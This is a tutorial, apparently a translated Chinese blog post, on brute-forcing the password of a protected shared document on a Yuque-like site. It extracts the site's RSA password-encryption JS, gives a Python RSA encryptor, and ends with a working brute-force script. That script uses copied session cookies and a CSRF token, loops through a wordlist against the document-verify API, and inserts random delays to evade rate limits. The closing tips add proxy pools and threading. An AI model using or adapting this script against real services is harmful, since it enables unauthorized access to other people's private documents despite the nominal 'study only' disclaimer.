Preface: this article is for technical study and discussion only and must not be used for any illegal activity. Questions: v:R88988988
aHR0cHM6Ly93d3cueXVxdWUuY29tL3h4eHh4L3h4eHgvZ2J2cDFuZGM5Z2d4Z2dweHojeHYyRXg=
I. Find the entry point
II. Notice that the submitted password is encrypted
III. Find the encryption JS from the call stack
IV. Locate the encryption JS code
V. Build the local JS
1. The site is built with multi-file webpack, so before pulling out any code you first have to find the loader (the webpack runtime) and pull that out.
2. Pull out the modules the encryption depends on.
3. Judging from the code it looks like RSA encryption; anyone interested can import an RSA library and test it themselves. The public key is:
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCfwyOyncSrUTmkaUPsXT6UUdXx
TQ6a0wgPShvebfwq8XeNj575bUlXxVa/ExIn4nOUwx6iR7vJ2fvz5Ls750D051S7
q70sevcmc8SsBNoaMQtyF/gETPBSsyWv3ccBJFrzZ5hxFdlVUfg6tXARtEI8rbIH
su6TBkVjk+n1Pw/ihQIDAQAB
-----END PUBLIC KEY-----
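To check the RSA guess without pulling the webpack loader, the password can be encrypted directly against the published public key. The block below is an added example, not code from the original post: it parses the PEM above into (n, e) with a small DER reader and applies RSAES-PKCS1-v1_5 padding in pure Python. The padding scheme and the base64 output format are assumptions (they are what common browser RSA libraries produce by default); if the server answers Bad Request with this ciphertext, the site's JS uses a different scheme and the extracted JS must be used instead.

```python
import base64
import os

# Public key as published on the page (1024-bit RSA), reflowed into PEM lines.
PUBLIC_KEY_PEM = """-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCfwyOyncSrUTmkaUPsXT6UUdXx
TQ6a0wgPShvebfwq8XeNj575bUlXxVa/ExIn4nOUwx6iR7vJ2fvz5Ls750D051S7
q70sevcmc8SsBNoaMQtyF/gETPBSsyWv3ccBJFrzZ5hxFdlVUfg6tXARtEI8rbIH
su6TBkVjk+n1Pw/ihQIDAQAB
-----END PUBLIC KEY-----"""

RSA_ENCRYPTION_OID = bytes.fromhex("2a864886f70d010101")  # 1.2.840.113549.1.1.1


def _der_tlv(buf: bytes, pos: int):
    """Read one DER tag-length-value at pos; return (tag, value, position after it)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long form: low 7 bits give the byte count
        n_len = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n_len], "big")
        pos += n_len
    return tag, buf[pos:pos + length], pos + length


def load_rsa_public_key(pem: str):
    """Parse a SubjectPublicKeyInfo PEM (-----BEGIN PUBLIC KEY----- form) into (n, e)."""
    body = "".join(l for l in pem.strip().splitlines() if not l.startswith("-----"))
    der = base64.b64decode(body)
    tag, spki, _ = _der_tlv(der, 0)
    if tag != 0x30:
        raise ValueError("expected outer SEQUENCE")
    tag, alg, pos = _der_tlv(spki, 0)              # AlgorithmIdentifier
    oid_tag, oid, _ = _der_tlv(alg, 0)
    if tag != 0x30 or oid_tag != 0x06 or oid != RSA_ENCRYPTION_OID:
        raise ValueError("not an rsaEncryption key")
    tag, bits, _ = _der_tlv(spki, pos)             # BIT STRING wrapping RSAPublicKey
    if tag != 0x03 or bits[0] != 0:
        raise ValueError("bad BIT STRING")
    tag, rsa, _ = _der_tlv(bits, 1)                # RSAPublicKey ::= SEQUENCE { n, e }
    tag_n, n_bytes, pos = _der_tlv(rsa, 0)
    tag_e, e_bytes, _ = _der_tlv(rsa, pos)
    if tag != 0x30 or tag_n != 0x02 or tag_e != 0x02:
        raise ValueError("bad RSAPublicKey")
    return int.from_bytes(n_bytes, "big"), int.from_bytes(e_bytes, "big")


def rsa_pkcs1_v15_encrypt(n: int, e: int, message: bytes) -> bytes:
    """RSAES-PKCS1-v1_5 (RFC 8017 7.2.1): EM = 0x00 || 0x02 || PS || 0x00 || M; c = EM^e mod n."""
    k = (n.bit_length() + 7) // 8              # 128 bytes for this 1024-bit key
    if len(message) > k - 11:
        raise ValueError("message too long for key size")
    ps = bytearray()
    while len(ps) < k - len(message) - 3:      # PS: random non-zero bytes, at least 8 of them
        b = os.urandom(1)
        if b != b"\x00":
            ps += b
    em = b"\x00\x02" + bytes(ps) + b"\x00" + message
    return pow(int.from_bytes(em, "big"), e, n).to_bytes(k, "big")


def encrypt_password_bytes(password: str) -> bytes:
    n, e = load_rsa_public_key(PUBLIC_KEY_PEM)
    return rsa_pkcs1_v15_encrypt(n, e, password.encode("utf-8"))


def encrypt_password(password: str) -> str:
    """Value for the "password" field: base64 of the ciphertext (assumed output format)."""
    return base64.b64encode(encrypt_password_bytes(password)).decode("ascii")


if __name__ == "__main__":
    n, e = load_rsa_public_key(PUBLIC_KEY_PEM)
    print(n.bit_length(), e)            # 1024 65537
    print(encrypt_password("123456"))   # 172 base64 characters, different on every run
```

Because the padding is random, two encryptions of the same password never match, so the output cannot be compared byte-for-byte with what the browser sends; the only check is whether the server accepts it. A 1024-bit key also caps the plaintext at 117 bytes, which is far more than any password.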
VI. Write the brute-force Python and start testing
import execjs
import requests
import time
import random

# Session cookies and CSRF token copied from a logged-in browser session; they
# expire and must be replaced with your own (both the yuque_ctoken cookie and the
# x-csrf-token header come from that session).
cookies = {
    'aliyungf_tc': '25a87d6e5e4b705840ec1bd3a95836bbc2d93aa190db7f0b00ba798f9dfbd472',
    'acw_tc': 'ac11000117154063813522213e8ac35802a892d4f5a4ecdedeca72d50d8c06',
    'yuque_ctoken': '-37vzbjTGbW3h2C_No5WhZoa',
    'receive-cookie-deprecation': '1',
    'lang': 'zh-cn',
}
headers = {
    'Accept': 'application/json',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Cache-Control': 'no-cache',
    'Connection': 'keep-alive',
    'Content-Type': 'application/json',
    'Origin': 'https://www.yuue.com',
    'Pragma': 'no-cache',
    'Referer': 'https://www.yuue.com/xxxxx/xxxx/gbp1ndc9ggxggpxz',
    'Sec-Fetch-Dest': 'empty',
    'Sec-Fetch-Mode': 'cors',
    'Sec-Fetch-Site': 'same-origin',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36',
    'X-Requested-With': 'XMLHttpRequest',
    'sec-ch-ua': '"Google Chrome";v="125", "Chromium";v="125", "Not.A/Brand";v="24"',
    'sec-ch-ua-mobile': '?0',
    'sec-ch-ua-platform': '"Windows"',
    'x-csrf-token': '-37vzbjTGbdh2C_No5WhZoa',
}

# test.js is the encryption code pulled out of the site's webpack bundle; its
# function s(plaintext) returns the encrypted password. Compile it once, not
# once per candidate.
with open('test.js', 'r', encoding='utf-8') as f:
    ctx = execjs.compile(f.read())

# code.txt is the wordlist, one candidate per line.
with open('code.txt', 'r', encoding='utf-8') as f:
    n = 0
    for line in f:
        pwd = line.strip()
        if not pwd:
            continue
        json_data = {
            'password': ctx.call('s', pwd),
        }
        res = requests.put('https://www.yuue.com/api/docs/137dddf96/verify',
                           cookies=cookies, headers=headers, json=json_data).text
        print(res)
        if 'true' in res:              # {"data":true}: the password was accepted
            print('Password found: ' + pwd)
            break
        if 'Bad Request' in res:       # ciphertext rejected: check the encryption step
            print('Bad Request: ' + pwd)
            break
        if '操作过于频繁' in res:       # server-side rate limit ("too many operations")
            print('Rate limited: ' + pwd)
            break
        n += 1
        if n == 4:                     # pause for a random interval every few requests
            time.sleep(random.uniform(1.1, 10.4))
            n = 1
VII. Responses
Invalid password:
Correct password:
{"data":true}
If the response is Bad Request, check how the password ciphertext is generated.
VIII. Suggestions
1. Setting up a proxy pool and using multiple threads will help the brute force.
2. I hope XX雀 improves its security measures and fixes this problem soon.